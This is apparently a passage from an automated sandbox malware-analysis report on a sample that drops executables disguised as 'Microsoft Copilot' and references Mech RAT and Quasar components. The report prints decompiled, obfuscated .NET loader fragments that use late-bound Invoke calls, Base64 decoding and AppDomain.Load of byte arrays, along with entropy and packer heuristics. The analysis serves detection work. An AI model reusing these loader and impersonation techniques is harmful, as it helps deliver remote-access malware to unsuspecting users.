                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: Microsoft Copilot.lnk.1.drLNK file: ..\..\..\..\..\..\Local\Temp\Microsoft Copilot.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PixpFUv4G7.exeStatic file information: File size 6669824 > 1048576
                    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                    Source: PixpFUv4G7.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x651000
                    Source: Binary string: 10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -QlONC:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Ql^]File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Qlts10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\Extension.Desktop\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll.4.dr
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\MSTest.CoreAdapter\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.pdb source: Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll.4.dr
                    Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: Gma.System.MouseKeyHook.dll.4.dr
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000004.00000002.1276652478.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: assembly_.dll.pdbR source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: MONOCE~3.DLLMono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B45000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdbSHA256 source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdb source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdbe+ source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\MSTest.Core\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.dll.4.dr
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdb source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: cil.Pdb.j source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdb source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll0] source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cil.Pdb. source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdbl source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: BouncyCastle.Crypto.pdb source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: .pdb;Pdb file found for path '{0}' source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.QXqheBYBDWmdO5ql2x6ldCHTvjDXHBVXLPOJUhWFGNDrLowZjRvTjGw,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.cR5q1TtwLue4QvaAhV1iKHyksopJYzGaomDuk6SzeHty3O3ErUQuXXa,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.iNCiWddRgJ1hoc1d6PshlCL2N1HMp7hK72B14lbH7VgPAkbnpQSSOnD,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.EW1OxE6tQp1VXmI1hNg2s8B1w2GTpYd7nBOus30FbmyVyq0LdpGRlbt,B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.YoDGckt8ud8LlAgWo4LL6xeCEtF3R9MbeNvXcVx3dsfBEz1lDFEGQjzcQp5qQDpKJljz4B4D2wMOarIK4utWq2l()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2],B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.m0rpAWerNinOiH6Bx9UnxG4vuQsLTg7lNYDDgnKWqNv0c4U9cM3WV9baKJdCRVK3Cijee7O0P(Convert.FromBase64String(SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.QXqheBYBDWmdO5ql2x6ldCHTvjDXHBVXLPOJUhWFGNDrLowZjRvTjGw,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.cR5q1TtwLue4QvaAhV1iKHyksopJYzGaomDuk6SzeHty3O3ErUQuXXa,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.iNCiWddRgJ1hoc1d6PshlCL2N1HMp7hK72B14lbH7VgPAkbnpQSSOnD,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.EW1OxE6tQp1VXmI1hNg2s8B1w2GTpYd7nBOus30FbmyVyq0LdpGRlbt,B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.YoDGckt8ud8LlAgWo4LL6xeCEtF3R9MbeNvXcVx3dsfBEz1lDFEGQjzcQp5qQDpKJljz4B4D2wMOarIK4utWq2l()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2],B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.m0rpAWerNinOiH6Bx9UnxG4vuQsLTg7lNYDDgnKWqNv0c4U9cM3WV9baKJdCRVK3Cijee7O0P(Convert.FromBase64String(SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk System.AppDomain.Load(byte[])
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH System.AppDomain.Load(byte[])
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk System.AppDomain.Load(byte[])
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH System.AppDomain.Load(byte[])
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH
                    Source: Mono.Cecil.Rocks.dll.4.drStatic PE information: 0xA5EFDE46 [Thu Mar 21 18:24:06 2058 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeCode function: 1_2_00007FFAACB3105D push ebx; retf 1_2_00007FFAACB3106A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACA0D2A5 pushad ; iretd 12_2_00007FFAACA0D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACBF2316 push 8B485F94h; iretd 12_2_00007FFAACBF231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACA2D2A5 pushad ; iretd 16_2_00007FFAACA2D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACC12316 push 8B485F92h; iretd 16_2_00007FFAACC1231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACC16A29 pushad ; iretd 16_2_00007FFAACC16A2A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFAACA1D2A5 pushad ; iretd 19_2_00007FFAACA1D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFAACC02316 push 8B485F93h; iretd 19_2_00007FFAACC0231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFAACA0D2A5 pushad ; iretd 21_2_00007FFAACA0D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFAACBF2316 push 8B485F94h; iretd 21_2_00007FFAACBF231B
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeCode function: 28_2_00007FFAACB500BD pushad ; iretd 28_2_00007FFAACB500C1
                    Source: Quasar.resources.dll.4.drStatic PE information: section name: .text entropy: 7.523596358740439
                    Source: Copilot.exe.0.dr, JROk0Eci9ENTX2os2noz7QF7om05s1eNs5Pju7pQ4InncB1gXtsCZxgYXaMKF9CalozBMWsRf.csHigh entropy of concatenated method names: 'zzz9kNPiyb347OFJGtsSWd91D8yHTr0DcPDJZuaqGMh9G7wR3ZcZ2mXzj1ovIv5lpJAhjq8Hf', 'w28s5Ov9OqqYWDPyFXgFqg63ybAsYSPVhX1dFiF4pFKh1638a5bkOXhLHduJqgR44opjpE3vi', '_8YhhV8wVsqXuGAtE2GSEM7Sj3Pv1a9NlKzRwyKgLX7pReNlBatJ5Q05paqiBHAubmwuBEWgms', 'v3HOUB0vSVfwYOs', 'kqVaN5oO22jKzuw', 'KTsJUDejD4ay42w', '_07RDr7CEnBMJyFR', '_1MFbc5OhNAEZonG', 'P9D8iU9QmyAimll', 'SQkSF9ifG7BfWqM'
                    Source: Copilot.exe.0.dr, XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.csHigh entropy of concatenated method names: 'e7gShrsOowb6OBBMuQbZjGo7NiUdJQdWs7ewdeuFfxmj0O1Qq7xIsR8V0szDKqHfZnYtxyLOk', 'i1VhreKaGWaODWzwCS9IJTaJBXnSvTblkQFdctlfezJoJUY0YWyKI7vtqOczGqiG62YgXBmX3', 'FCpqa1ykUc4HCbajI5zt9f44tjtHnmcjyts6XIFfvTdCw73XstgFzu7UAvcyCC5lNleMw24Ic', 'sZoLdrIe8ju684guo2SmBLwV8i0EyDA6FkKvqBFsUN7BgRNoaUbmjyESxiJuIv69zBGoXI3Hb'
                    Source: Copilot.exe.0.dr, 5OJs19f2uhPfUVeDxLPXHar.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_54vQtaO2du4tmlhYiHsboNIAmKcIDKrwtsicsnyx5TM8XH44VKWhlt226YiJtux1LzuslUzO6', 'xY3jqEnq9kzaWTDJ2c067h0ySl9VKemkcn5DYPaXpaApus8XZn5qAyIBI4jabpSTuOAPlXh4x', '_3w8f2ytK17lQsk8bOZ3KmloYRGbY6ndDPS9ishJeMY57MSHdnowmdrCxZTgghZN8YYHKJKWx7', 'aRTy8dvPWCTwlNEmETpNBCejoJtVaga0BmXLdkXNvw5tUpRCEF4msvSkAlvjcCiRtTLLf4lgJ'
                    Source: Copilot.exe.0.dr, 5fllQ7pqCcfYdIoqhx96LhArCojSoN2cBZDL1sFXjz7YVNsfr6AQfHO.csHigh entropy of concatenated method names: 'GDXchcMtGDkY1Vou9LYvAwf14iS5MdkdpbYOeczPReY8DRo4whLLs4y', 'EYJGL5lDkwuMliNjoq1drYzBaEX6rBXK2AKkp1mKAHboqJEoRIa4ld5', '_61ox06DpfX2PtLLtLZzpiT9L7GUWRrZLjFXndBbotM9sdgtutjYGRSg', '_4AwNxYSdSHwFOJMbp9fy4pR9YV13ciXZ76LFLH7AIHejgj2H2OEJAEj', 'VdHhYqYEYuzQvBx4H2YKkXnCMrhi2SX8Jc1S6QLyMRjCULAqucmJK7l', '_0Q57a8G3DXcwQfFS8pyBEfRDXGzjtG3LKO1hHqFvI1iPDG6AmToNpFJ', '_7lalOXRRoj63ahdWX3HMjGmtgwxBxYVhCygMId9KeaadrHjqjEO47Tv', 'l1nBJcwnAVgjhfQsEq3MZY8KqYmowdcWxtNiCs1zkIJ8sGXDuPjIcFI', 'vN6EVCZnq0d4fHLuBG2ejJ9ZgAgLRHyN2zwTQoc4YFhbCG0zuMpQpmm', '_4Vfu30y4aMEocc6AvnJMiwhbA8gAx2wkvftBh9hihRSNdGz7pSkchEF'
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.csHigh entropy of concatenated method names: 'Y2DzlIIVnJSnFRdxYcpmN2ErHj5Ro34Q954TsQwyda699iagsRoKgcw', 'NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk', 'VJT1HOu7wvydw6VkH0CCNuFbH6L7K8pX0mGF0frZocx11ArWTiToztd', 'EkSCZMVSQnV6DlScrtHGpsvzngeX6YP6blSBEwpkoj8trokbaSU9O3h', 'QNfHtEVuQ2ymP7yzBI4G7ISPtk1vO5fsfzZ82PmDWhlvPFKUiC0ooQj', 'JM65JA1sXick4wXH48WgQlX9Xy8cDCO5Kezo3r9i71jK9BvB3yZ3TuH', 'SSuecDAkyQnK8PFW383yc3vHl9I9HgBMVxikYudDcV0aOWEWSZZdn1O', 'zpIAK1K0RwzI9fu6ymxXTfFi3X5U5e2tgEWXq32bWGIrHso89fFraAI', 'kswgLpNWEa3rrMjudOXStJTf51pJCbLs29f6tVgpPb8ovOzUOm86BE6', '_0pgx9BtiL5nLEsgywMnjeOuDJb6kgzcIFFOq8fZRSSsGcW2EFahEORW'
                    Source: Copilot.exe.0.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csHigh entropy of concatenated method names: 'Rh8IOcOZivZ3DrlDLmNIwCsyYHXpIeYkJhJO1QVhNY3tBqg35b7x34B', 'AfdAljf2buztXsx1XiGKdNAkJrgVMTtp4EMR7uAICpcT7nqCTgca8Q8', 'P9V1Ih5rsAV6a1nikxPqNtY9N6jkVXkxW2lPdGgMUdo9lhZRTY7mv1e', 'X25xugaawcC4cTH5I1fWPQz6gzGAMTTZlljlbLrfJcK3v5xG43QKyAj', 'vCV9er41lqc62F3nmnXBywE6aS6SzVQsNadyDnd255XSX4mKLXMaZbQ', '_5vnlwydEsVRKyeSdp46qUI0eDqNoN7NhUxiDX3PqrbSpcLlMwpabjbs', 'GNwINVOMISs71IP8DwssQ1lzeFEWC0LgvzZW4pJVXY085y5qgifsg4g', 'CYfCJqeUrdpt3RyziTjTuvaSiYtTfg85SteeWEhugvkzM6Xsi0PFoB6', 'RQlnXojfaB4AsdGp9fzX0ndZXQBPQqzLVIUn2E9c9c07G9oB3bgcutU', 'pEFfV4LXwLhAXpxsm8ir9L6nGZMyVsn6bBI20ZoBv6xjA1f7iRdtLnF'
                    Source: Copilot.exe.0.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csHigh entropy of concatenated method names: 'wd76gDubxesDbDajQMUcaXkr9pTksJZPBeuflwgSj1MDa2IQvyGjDdSv9ADZ9B6CweGvSTGSShuu5dM4QBeWG9I', 'fNgi7pPBcbsQy9237UndotP16XTPTisnfZZg8aORcJcVHgGDn3t2tW0NOXUa7UXoaHcBEpllHsp7kTiQldFbkJ7', '_7Eq7iOmpU53TTL8OHOAqqdBQz0o3ZyZ3waB5TJ00Uwgl2rc0DeB567MejLOKt9RKQOZnRy7WQ9dDLkrc7kn9Yi9', '_56N8isy8FI1GuJBl0z4C97Exkx9DmPTVhg08FgBnwD2UwJbcT7SIERrN04Ay9U8ARzDTgLxkvHNmDbQF0rCZTGM', '_5rDOO4kboCqyZPyzA2OaLmSQ3MR3CPrXR8kf87WFNwYW1IwjTSowvn26IhLEWcE9buxmmXZqQTVhySOcv1B7qr0', 'MsXc94LEFTYocjklQThny61epluqEyxDUubulPuO0jqRBLShKfjA07v3t6tOfFdmr1MyE3Dx9IhhIiJknVhUQqi', 'RXscBl8tsb4J5B3Hg3HuxHnUrbAItIsyvMVhufxjaU3xmx27h7rA5jB2azQBHcPnq6oXkQWD16BD7wLJyROp5jY', 'iegOmGxTPr28aBjTs1Bpt3gyCSgOA4ldBKs7MHbHTO59fBv6Bk2AgdwazLH2SdZfvgmu3ESMfXjVxFaaiaIP6rJ', '_9SJCwAwqP1bNJ1lxmTucjMgUJ3uVv0E3ADEgYVmlr3OYlPEH5JwxrK44d4eE3Be8DlbiVFOYB2WjaV9KRFiYlGD', '_5dLEcawLxZeFVKZjgpN3wzdhbKaPtDhQOFKyHjPR9MIFsyMgVpijXc15Wr8KIJUPqhdIITTsfWDOeicEZlxZK9o'
                    Source: Copilot.exe.0.dr, lN9yj0DclvLFRThUfMYKKmx2hzrhxQ13n5kxy2uTP7z60LyMXNHr5aH2jqOLeRa4Pi9le3w24R6tmLaZf8rxnyC.csHigh entropy of concatenated method names: 'asG8aK4379S4LVCWeww50ZK1vccCwVCRHCQgD4Ttkcesi7hM1iBGOi0w6QJhyvNQTnOKDpqVArBx7i0J7VfZagn', 'RBotrOTrFq2SH6MOLHscsFYm1gIiFwiw49RstOzq9T2M5c8XngG9XGaDNlMOYiCh9YF8wPXEieU6ro9JXJoZGGd', 'LLvNWppYJwppCewCURVUIOv256OxJFlObOUrrbVbxQ9Jzk9Ud2Dn6sktBMc60ueRNkvbqrgZpCyznX9WES6LIDB', '_1D8H93VJcm5uLul3rV4GmDH5kBITjCt1W72fXJCWAx2mtqvEnbz2GMHGEXmUANIRcamcCVxw9bDxnN5Hn46jKWI', 'GJQCgPL0mJRNm3M', '_4MZQxFDozqVQOs0', 'dFghmN08kbr7QtI', 'wgsKqYmdAb5ZZQI', 't8GUAUDDrhNkhmv', '_2rtGFiKXxe6wvJV'
                    Source: Copilot.exe.0.dr, 08I4HlpfZvcXgQJn6jhwLOiX5NhqxmSDMQTziisZ5tgE8NeYxznxnl0.csHigh entropy of concatenated method names: 'rkhiNPWgaENIbdkCp6mJtdOPN3mFbpQMuPwvi8kf4rGCc2X72CpsDNt', '_59bJb29T3A9eh4GP7lPhvEZDx5CXQKRkNqgJsPN3vWk8rPr3YsWN6q1FQAdkmo7JVizqwY4Bc0hhMF873KwYNxE', '_8SpLtqtxL11qXpFPX0EYNetLlM7tGh5fkVJXBWlIBPqVCCMlqqoEtdyIYiSROIRSFJUCYVze3U7GOgybQJ1GZ4B', '_3tN4sqb7XBF96eyGZbHxv1TWxurThY4vI02UIVrImdNI7ZZ3yxAw34w8MHNp44J9sS1m4qNtxWtJc6cGBgvt2ym', 'UQBh4otD5J4nlDsaVWOkC8ul68K27zQk7FVjcst0hAxOyvXHJZp1hgwAhyK8oAigDYhN5Oc9gu453aovpq1m3EQ', 'lBAkOyFN4esJnd6690p9qvYki7ULS5jkmRPFPFIvZmlkhOv8jdfX7MiLJ4mM2T8AZutZSoxVZ2GtseegPiFKjHL', 'VRPg9HqyC1arRrsr8BoK5OUv9X8pjpUTh10SPJW4GIotpLazNtgLvv04K5DmXcqBXsNNIEcxbeu9H9ZtQzd1hcm', 'ha4EUhVu1mLLH2coeWSfQZrhSfxZJDXOgv2uauPZ6fPKI8yxvygvQVk3CvudwZqQ3Wg3j4guhUTHn1zs5k0Zm9R', 